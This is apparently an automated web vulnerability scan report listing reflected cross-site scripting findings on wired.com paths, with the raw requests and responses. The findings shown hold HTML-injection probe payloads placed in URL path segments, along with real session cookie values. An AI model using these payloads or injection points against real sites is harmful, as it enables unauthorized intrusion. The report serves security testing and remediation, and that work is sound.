1.872. http://www.wired.com/wired/coverbrowser/1996 [REST URL parameter 2]

1.873. http://www.wired.com/wired/coverbrowser/1996 [REST URL parameter 3]

1.874. http://www.wired.com/wired/coverbrowser/1997 [REST URL parameter 2]

1.875. http://www.wired.com/wired/coverbrowser/1997 [REST URL parameter 3]

1.876. http://www.wired.com/wired/coverbrowser/1998 [REST URL parameter 2]

1.877. http://www.wired.com/wired/coverbrowser/1998 [REST URL parameter 3]

1.878. http://www.wired.com/wired/coverbrowser/1999 [REST URL parameter 2]

1.879. http://www.wired.com/wired/coverbrowser/1999 [REST URL parameter 3]

1.880. http://www.wired.com/wired/coverbrowser/2000 [REST URL parameter 2]

1.881. http://www.wired.com/wired/coverbrowser/2000 [REST URL parameter 3]

1.882. http://www.wired.com/wired/coverbrowser/2001 [REST URL parameter 2]

1.883. http://www.wired.com/wired/coverbrowser/2001 [REST URL parameter 3]

1.884. http://www.wired.com/wired/coverbrowser/2002 [REST URL parameter 2]

1.885. http://www.wired.com/wired/coverbrowser/2002 [REST URL parameter 3]

1.886. http://www.wired.com/wired/coverbrowser/2003 [REST URL parameter 2]

1.887. http://www.wired.com/wired/coverbrowser/2003 [REST URL parameter 3]

1.888. http://www.wired.com/wired/coverbrowser/2004 [REST URL parameter 2]

1.889. http://www.wired.com/wired/coverbrowser/2004 [REST URL parameter 3]

1.890. http://www.wired.com/wired/coverbrowser/2005 [REST URL parameter 2]

1.891. http://www.wired.com/wired/coverbrowser/2005 [REST URL parameter 3]

1.892. http://www.wired.com/wired/coverbrowser/2006 [REST URL parameter 2]

1.893. http://www.wired.com/wired/coverbrowser/2006 [REST URL parameter 3]

1.894. http://www.wired.com/wired/coverbrowser/2007 [REST URL parameter 2]

1.895. http://www.wired.com/wired/coverbrowser/2007 [REST URL parameter 3]

1.896. http://www.wired.com/wired/coverbrowser/2008 [REST URL parameter 2]

1.897. http://www.wired.com/wired/coverbrowser/2008 [REST URL parameter 3]

1.898. http://www.wired.com/wired/coverbrowser/2009 [REST URL parameter 2]

1.899. http://www.wired.com/wired/coverbrowser/2009 [REST URL parameter 3]

1.900. http://www.wired.com/wired/issue/15-06/ [REST URL parameter 2]

1.901. http://www.wired.com/wired/issue/15-06/ [REST URL parameter 3]

1.902. http://www.wired.com/wired/issue/15-07/ [REST URL parameter 2]

1.903. http://www.wired.com/wired/issue/15-07/ [REST URL parameter 3]

1.904. http://www.wired.com/wired/issue/15-08/ [REST URL parameter 2]

1.905. http://www.wired.com/wired/issue/15-08/ [REST URL parameter 3]

1.906. http://www.wired.com/wired/issue/15-09/ [REST URL parameter 2]

1.907. http://www.wired.com/wired/issue/15-09/ [REST URL parameter 3]

1.908. http://www.wired.com/wired/issue/15-10/ [REST URL parameter 2]

1.909. http://www.wired.com/wired/issue/15-10/ [REST URL parameter 3]

1.910. http://www.wired.com/wired/issue/15-11/ [REST URL parameter 2]

1.911. http://www.wired.com/wired/issue/15-11/ [REST URL parameter 3]

1.912. http://www.wired.com/wired/issue/15-12/ [REST URL parameter 2]

1.913. http://www.wired.com/wired/issue/15-12/ [REST URL parameter 3]

1.914. http://www.wired.com/wired/issue/16-01/ [REST URL parameter 2]

1.915. http://www.wired.com/wired/issue/16-01/ [REST URL parameter 3]

1.916. http://www.wired.com/wired/issue/16-02/ [REST URL parameter 2]

1.917. http://www.wired.com/wired/issue/16-02/ [REST URL parameter 3]

1.918. http://www.wired.com/wired/issue/16-03/ [REST URL parameter 2]

1.919. http://www.wired.com/wired/issue/16-03/ [REST URL parameter 3]

1.920. http://www.wired.com/wired/issue/16-04/ [REST URL parameter 2]

1.921. http://www.wired.com/wired/issue/16-04/ [REST URL parameter 3]

1.922. http://www.wired.com/wired/issue/16-05/ [REST URL parameter 2]

1.923. http://www.wired.com/wired/issue/16-05/ [REST URL parameter 3]

1.924. http://www.wired.com/wired/issue/16-06 [REST URL parameter 2]

1.925. http://www.wired.com/wired/issue/16-06 [REST URL parameter 3]

1.926. http://www.wired.com/wired/issue/16-07 [REST URL parameter 2]

1.927. http://www.wired.com/wired/issue/16-07 [REST URL parameter 3]

1.928. http://www.wired.com/wired/issue/16-08 [REST URL parameter 2]

1.929. http://www.wired.com/wired/issue/16-08 [REST URL parameter 3]

1.930. http://www.wired.com/wired/issue/16-09 [REST URL parameter 2]

1.931. http://www.wired.com/wired/issue/16-09 [REST URL parameter 3]

1.932. http://www.wired.com/wired/issue/16-10 [REST URL parameter 2]

1.933. http://www.wired.com/wired/issue/16-10 [REST URL parameter 3]

1.934. http://www.wired.com/wired/issue/16-11 [REST URL parameter 2]

1.935. http://www.wired.com/wired/issue/16-11 [REST URL parameter 3]

1.936. http://www.wired.com/wired/issue/16-12 [REST URL parameter 2]

1.937. http://www.wired.com/wired/issue/16-12 [REST URL parameter 3]

1.938. http://www.wired.com/wired/issue/17-01 [REST URL parameter 2]

1.939. http://www.wired.com/wired/issue/17-01 [REST URL parameter 3]

1.940. http://www.wired.com/wired/issue/17-02 [REST URL parameter 2]

1.941. http://www.wired.com/wired/issue/17-02 [REST URL parameter 3]

1.942. http://www.wired.com/wired/issue/17-03 [REST URL parameter 2]

1.943. http://www.wired.com/wired/issue/17-03 [REST URL parameter 3]

1.944. http://www.wired.com/wired/issue/17-04 [REST URL parameter 2]

1.945. http://www.wired.com/wired/issue/17-04 [REST URL parameter 3]

1.946. http://www.wired.com/wired/issue/17-05 [REST URL parameter 2]

1.947. http://www.wired.com/wired/issue/17-05 [REST URL parameter 3]

1.948. http://www.wired.com/wired/issue/17-06 [REST URL parameter 2]

1.949. http://www.wired.com/wired/issue/17-06 [REST URL parameter 3]

1.950. http://www.wired.com/wired/issue/17-07 [REST URL parameter 2]

1.951. http://www.wired.com/wired/issue/17-07 [REST URL parameter 3]

1.952. http://www.wired.com/wired/issue/17-08 [REST URL parameter 2]

1.953. http://www.wired.com/wired/issue/17-08 [REST URL parameter 3]

1.954. http://www.wired.com/wired/issue/17-09 [REST URL parameter 2]

1.955. http://www.wired.com/wired/issue/17-09 [REST URL parameter 3]

1.956. http://www.wired.com/wired/issue/17-10 [REST URL parameter 2]

1.957. http://www.wired.com/wired/issue/17-10 [REST URL parameter 3]

1.958. http://www.wired.com/wired/issue/geekipedia [REST URL parameter 2]

1.959. http://www.wired.com/wired/issue/geekipedia [REST URL parameter 3]

1.960. http://www.wired.com/wired/issue/test2007/ [REST URL parameter 2]

1.961. http://www.wired.com/wired/issue/test2007/ [REST URL parameter 3]



1. Cross-site scripting (reflected)
There are 961 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.wired.com/ajax/widgets/related/content/blogPost/autopia_29989 [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/autopia_29989

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e3bf"><a>5de4eb6055f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax9e3bf"><a>5de4eb6055f/widgets/related/content/blogPost/autopia_29989 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29389
Vary: Accept-Encoding
Cache-Control: max-age=227
Expires: Mon, 22 Nov 2010 01:13:57 GMT
Date: Mon, 22 Nov 2010 01:10:10 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax9e3bf"><a>5de4eb6055f ss_widgets c_related">
...[SNIP]...

1.2. http://www.wired.com/ajax/widgets/related/content/blogPost/autopia_29989 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/autopia_29989

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b57b"><a>764ea10e8d2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax/widgets1b57b"><a>764ea10e8d2/related/content/blogPost/autopia_29989 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29389
Vary: Accept-Encoding
Cache-Control: max-age=220
Expires: Mon, 22 Nov 2010 01:14:29 GMT
Date: Mon, 22 Nov 2010 01:10:49 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgets1b57b"><a>764ea10e8d2 c_related">
...[SNIP]...

1.3. http://www.wired.com/ajax/widgets/related/content/blogPost/autopia_29989 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/autopia_29989

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf640"><a>99098f04c4b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax/widgets/relatedbf640"><a>99098f04c4b/content/blogPost/autopia_29989 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29389
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:15:05 GMT
Date: Mon, 22 Nov 2010 01:11:05 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgets c_relatedbf640"><a>99098f04c4b">
...[SNIP]...

1.4. http://www.wired.com/ajax/widgets/related/content/blogPost/epicenter_25377 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/epicenter_25377

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f0d1"><a>9e67eb28264 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax8f0d1"><a>9e67eb28264/widgets/related/content/blogPost/epicenter_25377 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29391
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:14:27 GMT
Date: Mon, 22 Nov 2010 01:10:27 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax8f0d1"><a>9e67eb28264 ss_widgets c_related">
...[SNIP]...

1.5. http://www.wired.com/ajax/widgets/related/content/blogPost/epicenter_25377 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/epicenter_25377

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f855"><a>144ef7ca22 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax/widgets4f855"><a>144ef7ca22/related/content/blogPost/epicenter_25377 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29389
Vary: Accept-Encoding
Cache-Control: max-age=233
Expires: Mon, 22 Nov 2010 01:14:45 GMT
Date: Mon, 22 Nov 2010 01:10:52 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgets4f855"><a>144ef7ca22 c_related">
...[SNIP]...

1.6. http://www.wired.com/ajax/widgets/related/content/blogPost/epicenter_25377 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/epicenter_25377

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5558d"><a>877c7a8d468 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax/widgets/related5558d"><a>877c7a8d468/content/blogPost/epicenter_25377 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29391
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:15:11 GMT
Date: Mon, 22 Nov 2010 01:11:11 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgets c_related5558d"><a>877c7a8d468">
...[SNIP]...

1.7. http://www.wired.com/ajax/widgets/related/content/blogPost/epicenter_25571 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/epicenter_25571

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e30b"><a>f706f81ec9d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax9e30b"><a>f706f81ec9d/widgets/related/content/blogPost/epicenter_25571 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29391
Vary: Accept-Encoding
Cache-Control: max-age=219
Expires: Mon, 22 Nov 2010 01:14:06 GMT
Date: Mon, 22 Nov 2010 01:10:27 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax9e30b"><a>f706f81ec9d ss_widgets c_related">
...[SNIP]...

1.8. http://www.wired.com/ajax/widgets/related/content/blogPost/epicenter_25571 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/epicenter_25571

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4be84"><a>0968336159a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax/widgets4be84"><a>0968336159a/related/content/blogPost/epicenter_25571 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29391
Vary: Accept-Encoding
Cache-Control: max-age=232
Expires: Mon, 22 Nov 2010 01:14:44 GMT
Date: Mon, 22 Nov 2010 01:10:52 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgets4be84"><a>0968336159a c_related">
...[SNIP]...

1.9. http://www.wired.com/ajax/widgets/related/content/blogPost/epicenter_25571 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/epicenter_25571

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f77cf"><a>7b2d4dc85a2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax/widgets/relatedf77cf"><a>7b2d4dc85a2/content/blogPost/epicenter_25571 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29391
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:15:09 GMT
Date: Mon, 22 Nov 2010 01:11:09 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgets c_relatedf77cf"><a>7b2d4dc85a2">
...[SNIP]...

1.10. http://www.wired.com/ajax/widgets/related/content/blogPost/magazine_39648 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/magazine_39648

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbe51"><a>c45b8c7122 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajaxbbe51"><a>c45b8c7122/widgets/related/content/blogPost/magazine_39648 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29388
Vary: Accept-Encoding
Cache-Control: max-age=232
Expires: Mon, 22 Nov 2010 01:14:22 GMT
Date: Mon, 22 Nov 2010 01:10:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajaxbbe51"><a>c45b8c7122 ss_widgets c_related">
...[SNIP]...

1.11. http://www.wired.com/ajax/widgets/related/content/blogPost/magazine_39648 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/magazine_39648

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 934e2"><a>e80de08ba2a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax/widgets934e2"><a>e80de08ba2a/related/content/blogPost/magazine_39648 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29390
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:14:55 GMT
Date: Mon, 22 Nov 2010 01:10:55 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgets934e2"><a>e80de08ba2a c_related">
...[SNIP]...

1.12. http://www.wired.com/ajax/widgets/related/content/blogPost/magazine_39648 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
